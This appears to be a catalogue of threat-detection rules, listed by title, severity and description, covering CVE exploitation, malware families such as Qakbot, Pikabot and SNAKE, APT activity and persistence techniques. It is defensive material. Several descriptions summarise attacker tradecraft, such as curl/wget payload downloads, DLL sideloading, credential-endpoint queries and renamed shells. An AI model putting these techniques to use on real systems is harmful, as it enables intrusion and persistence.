DNS RCE CVE-2020-1350criticalDetects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoChighDetects the execution of the commonly used ZeroLogon PoC executable.
Suspicious PrinterPorts Creation (CVE-2020-1048)highDetects new commands that add new printer port which point to suspicious file
Exploited CVE-2020-10189 Zoho ManageEnginehighDetects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - RegistryhighDetects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
Blue MockingbirdhighAttempts to detect system changes made by Blue Mockingbird
Potential Maze Ransomware ActivitycriticalDetects specific process characteristics of Maze ransomware word document droppers
Trickbot Malware ActivityhighDetects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
Lazarus Group ActivitycriticalDetects different process execution behaviors as described in various threat reports on Lazarus group activity
UNC2452 Process Creation PatternshighDetects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
Greenbug Espionage Group IndicatorscriticalDetects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
UNC2452 PowerShell PatterncriticalDetects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
TAIDOOR RAT DLL LoadhighDetects specific process characteristics of Chinese TAIDOOR RAT malware load
CVE-2021-1675 Print Spooler Exploitation Filename PatterncriticalDetects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
Possible CVE-2021-1675 Print Spooler ExploitationhighDetects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
CVE-2021-1675 Print Spooler ExploitationcriticalDetects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
CVE-2021-1675 Print Spooler Exploitation IPC AccesscriticalDetects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
Potential Atlassian Confluence CVE-2021-26084 Exploitation AttempthighDetects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
Potential CVE-2021-26857 Exploitation AttempthighDetects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
CVE-2021-26858 Exchange ExploitationhighDetects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
Potential CVE-2021-40444 Exploitation AttempthighDetects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
Potential Exploitation Attempt From Office ApplicationhighDetects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
CVE-2021-44077 POC Default Dropped FilehighDetects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
Potential BlackByte Ransomware ActivityhighDetects command line patterns used by BlackByte ransomware in different operations
DarkSide Ransomware PatterncriticalDetects DarkSide Ransomware and helpers
Goofy Guineapig Backdoor IOChighDetects malicious indicators seen used by the Goofy Guineapig malware
Potential Goofy Guineapig Backdoor ActivityhighDetects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
REvil Kaseya Incident Malware PatternscriticalDetects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
Potential CVE-2023-21554 QueueJumper ExploitationhighDetects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code ExecutionmediumDetects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
Potential CVE-2022-26809 Exploitation AttempthighDetects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
Potential CVE-2022-29072 Exploitation AttempthighDetects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.
Potential Bumblebee Remote Thread CreationhighDetects remote thread injection events based on action seen used by bumblebee
ChromeLoader Malware ExecutionhighDetects execution of ChromeLoader malware via a registered scheduled task
Emotet Loader Execution Via .LNK FilehighDetects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.
Hermetic Wiper TG Process PatternshighDetects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
Raspberry Robin Subsequent Execution of CommandshighDetects raspberry robin subsequent execution of commands.
Raspberry Robin Initial Execution From External DrivehighDetects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
Serpent Backdoor Payload Execution Via Scheduled TaskhighDetects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
Potential Raspberry Robin Dot Ending FilehighDetects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
FakeUpdates/SocGholish ActivityhighDetects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
MERCURY APT ActivityhighDetects suspicious command line patterns seen being used by MERCURY APT
MSMQ Corrupted Packet EncounteredhighDetects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)highDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXEmediumDetects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer LocationmediumDetects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe CreationhighDetects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
Potential CVE-2023-36874 Exploitation - Fake Wermgr ExecutionhighDetects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension FilehighDetects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
CVE-2023-40477 Potential Exploitation - .REV File CreationlowDetects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child ProcesshighDetects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
CVE-2023-40477 Potential Exploitation - WinRAR Application CrashmediumDetects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
DarkGate - Autoit3.EXE File Creation By Uncommon ProcessmediumDetects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
DarkGate - Autoit3.EXE Execution ParametershighDetects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.
Griffon Malware Attack PatterncriticalDetects process execution patterns related to Griffon malware as reported by Kaspersky
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXEmediumDetects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
Pikabot Fake DLL Extension Execution Via Rundll32.EXEhighDetects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
Qakbot Regsvr32 Calc PatternhighDetects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
Potential Qakbot Rundll32 ExecutionhighDetects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
Qakbot Rundll32 Exports ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
Qakbot Rundll32 Fake DLL Extension ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
Qakbot Uninstaller ExecutionhighDetects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
Rorschach Ransomware Execution ActivitycriticalDetects Rorschach ransomware execution activity
SNAKE Malware Kernel Driver File IndicatorcriticalDetects SNAKE malware kernel driver file indicator
SNAKE Malware WerFault Persistence File CreationhighDetects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
SNAKE Malware Installer Name IndicatorslowDetects filename indicators associated with the SNAKE malware as reported by CISA in their report
Potential SNAKE Malware Installation CLI Arguments IndicatorhighDetects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
Potential SNAKE Malware Installation Binary IndicatorhighDetects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
Potential SNAKE Malware Persistence Service ExecutionhighDetects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
Ursnif Redirection Of Discovery CommandshighDetects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
Potential Compromised 3CXDesktopApp ExecutionhighDetects execution of known compromised version of 3CXDesktopApp
Potential Suspicious Child Process Of 3CXDesktopApphighDetects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
Potential Compromised 3CXDesktopApp Update ActivityhighDetects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
Diamond Sleet APT File Creation IndicatorshighDetects file creation activity that is related to Diamond Sleet APT activity
Diamond Sleet APT Process Activity IndicatorshighDetects process creation activity indicators related to Diamond Sleet APT
Diamond Sleet APT Scheduled Task CreationcriticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
Potential APT FIN7 Related PowerShell Script CreatedhighDetects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
Potential APT FIN7 POWERHOLD ExecutionhighDetects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
Potential POWERTRASH Script ExecutionhighDetects potential execution of the PowerShell script POWERTRASH
Potential APT FIN7 Reconnaissance/POWERTRASH Related ActivityhighDetects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
Lace Tempest File IndicatorshighDetects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
Lace Tempest PowerShell Evidence EraserhighDetects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
Lace Tempest PowerShell LauncherhighDetects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
Lace Tempest Cobalt Strike DownloadhighDetects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
Lace Tempest Malware Loader ExecutionhighDetects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
Mint Sandstorm - AsperaFaspex Suspicious Process ExecutioncriticalDetects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
Mint Sandstorm - Log4J Wstomcat Process ExecutionhighDetects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
Mint Sandstorm - ManageEngine Suspicious Process ExecutioncriticalDetects suspicious execution from ManageEngine as seen used by Mint Sandstorm
Potential APT Mustang Panda Activity Against Australian GovhighDetects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
Onyx Sleet APT File Creation IndicatorshighDetects file creation activity that is related to Onyx Sleet APT activity
PaperCut MF/NG Exploitation Related IndicatorshighDetects exploitation indicators related to PaperCut MF/NG Exploitation
PaperCut MF/NG Potential ExploitationhighDetects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
Peach Sandstorm APT Process Activity IndicatorshighDetects process creation activity related to Peach Sandstorm APT
UNC4841 - Email Exfiltration File PatternhighDetects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation IndicatorshighDetects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
UNC4841 - Potential SEASPY ExecutioncriticalDetects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child ProcesshighDetects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File CreationmediumDetects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins GrouphighDetects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group ActivityhighDetects any creation or modification to a windows domain group with the name "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
CVE-2024-50623 Exploitation Attempt - CleohighDetects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
DarkGate - Drop DarkGate Loader In C:\Temp DirectorymediumDetects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
File Creation Related To RAT ClientshighFile .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
Potential KamiKakaBot Activity - Lure Document ExecutionmediumDetects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
Kapeka Backdoor Loaded Via Rundll32.EXEhighDetects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
Kapeka Backdoor Scheduled Task CreationhighDetects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
Potential Raspberry Robin CPL Execution ActivityhighDetects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
Potential APT FIN7 Exploitation ActivitymediumDetects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
Forest Blizzard APT - Process Creation ActivityhighDetects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT.
DNS Request From Windows Script HostlowDetects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.
Python Path Configuration File Creation - LinuxmediumDetects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Python Path Configuration File Creation - MacOSmediumDetects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Scheduled Task DeletionlowDetects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
Remote Thread Creation Via PowerShellmediumDetects the creation of a remote thread from a Powershell process to another process
Python Path Configuration File Creation - WindowsmediumDetects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Scheduled Task Created - FileCreationlowDetects the creation of a scheduled task via file creation.
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious LocationlowDetects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determining if its malicious.
Microsoft Excel Add-In LoadedlowDetects Microsoft Excel loading an Add-In (.xll) file
Microsoft Word Add-In LoadedlowDetects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
WMI Module Loaded By Uncommon ProcesslowDetects WMI modules being loaded by an uncommon process
Dfsvc.EXE Network Connection To Non-Local IPsmediumDetects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
Dfsvc.EXE Initiated Network Connection Over Uncommon PorthighDetects an initiated network connection over uncommon ports from "dfsvc.exe". A utility used to handled ClickOnce applications.
Dllhost.EXE Initiated Network Connection To Non-Local IP AddressmediumDetects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
Network Connection Initiated By PowerShell ProcesslowDetects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
PsExec Default Named PipelowDetects PsExec service default pipe creation
Uncommon PowerShell HostsmediumDetects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
bXOR Operator Usage In PowerShell Command Line - PowerShell ClassiclowDetects powershell execution with that make use of to the bxor (Bitwise XOR). Attackers might use as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.
WinAPI Library Calls Via PowerShell ScriptsmediumDetects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
WinAPI Function Calls Via PowerShell ScriptsmediumDetects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
Potential BOINC Software Execution (UC-Berkeley Signature)informationalDetects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
Potential File Override/Append Via SET CommandlowDetects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". The typical use case of the "set /p=" command is to prompt the user for input.
Diskshadow Child Process SpawnedmediumDetects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
ClickOnce Deployment Execution - Dfsvc.EXE Child ProcessmediumDetects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
Diskshadow Script Mode ExecutionmediumDetects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
Microsoft Workflow Compiler ExecutionmediumDetects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
Suspicious New Instance Of An Office COM ObjectmediumDetects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
Import New Module Via PowerShell CommandLinelowDetects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session
Unusually Long PowerShell CommandLinelowDetects unusually long PowerShell command lines with a length of 1000 characters or more
Potentially Suspicious PowerShell Child ProcessesmediumDetects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
Remote Access Tool - Ammy Admin Agent ExecutionmediumDetects the execution of the Ammy Admin RMM agent for remote management.
Remote Access Tool - Cmd.EXE Execution via AnyViewermediumDetects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
Remote Access Tool - ScreenConnect Remote Command Execution - HuntingmediumDetects remote binary or command execution via the ScreenConnect Service. Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
Scheduled Task Creation From Potential Suspicious Parent LocationmediumDetects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
Elevated System Shell SpawnedmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
Manual Execution of Script Inside of a Compressed FilemediumThis is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. 1. Compressed file opened using 7zip. 2. Compressed file opened using WinRar. 3. Compressed file opened using native windows File Explorer capabilities. When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/WscriptmediumDetects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
Arbitrary Command Execution Using WSLmediumDetects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
Cab File Extraction Via Wusa.EXEmediumDetects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
Scheduled Task Created - RegistrylowDetects the creation of a scheduled task via Registry keys.
Command Executed Via Run Dialog Box - RegistrylowDetects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Privilege Escalation PreparationmediumDetects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.
Invoke-Obfuscation CLIP+ LauncherhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation STDIN+ LauncherhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ LauncherhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATIONmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHERmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via StdinhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use CliphighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTAhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32highDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATIONhighDetects Obfuscated Powershell via VAR++ LAUNCHER
File Creation by Office ApplicationshighThis rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
Automated Turla Group Lateral MovementmediumDetects automated lateral movement by Turla group
Quick Execution of a Series of Suspicious CommandslowDetects multiple suspicious process in a limited timeframe
Metasploit Or Impacket Service Installation Via SMB PsExechighDetects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
Remote Schtasks CreationmediumDetects remote execution via scheduled task creation or update on the destination host
Rare Schtasks CreationslowDetects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
attack.persistence 564
Show Rules (564)
Title Level Description
Edit of .bash_profile and .bashrcmediumDetects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
SCM DLL SideloadmediumDetects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
Svchost DLL Search Order HijackhighDetects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
Suspicious Get-WmiObjectlowThe infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers
New Service CreationlowDetects creation of a new service.
Suspicious Bitsadmin Job via PowerShellhighDetect download by BITS jobs via PowerShell
Suspicious Bitstransfer via PowerShellmediumDetects transferring files from system on a server bitstransfer Powershell cmdlets
Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Abusing Windows Telemetry For Persistence - RegistryhighWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
Potential Persistence Via COM Hijacking From Suspicious LocationshighDetects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location.
Potential Persistence Via COM Search Order HijackingmediumDetects potential COM object hijacking leveraging the COM Search Order
SilentProcessExit Monitor RegistrationhighDetects changes to the Registry in which a monitor program gets registered to monitor the exit of another process
Kubernetes CronJob/Job ModificationmediumDetects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
Kubernetes Admission Controller ModificationmediumDetects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
OpenCanary - SSH Login AttempthighDetects instances where an SSH service on an OpenCanary node has had a login attempt.
OpenCanary - SSH New Connection AttempthighDetects instances where an SSH service on an OpenCanary node has had a connection attempt.
Antivirus Web Shell DetectionhighDetects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
AWS Key Pair Import ActivitymediumDetects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
AWS ECS Task Definition That Queries The Credential EndpointmediumDetects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
AWS ElastiCache Security Group CreatedlowDetects when an ElastiCache security group has been created.
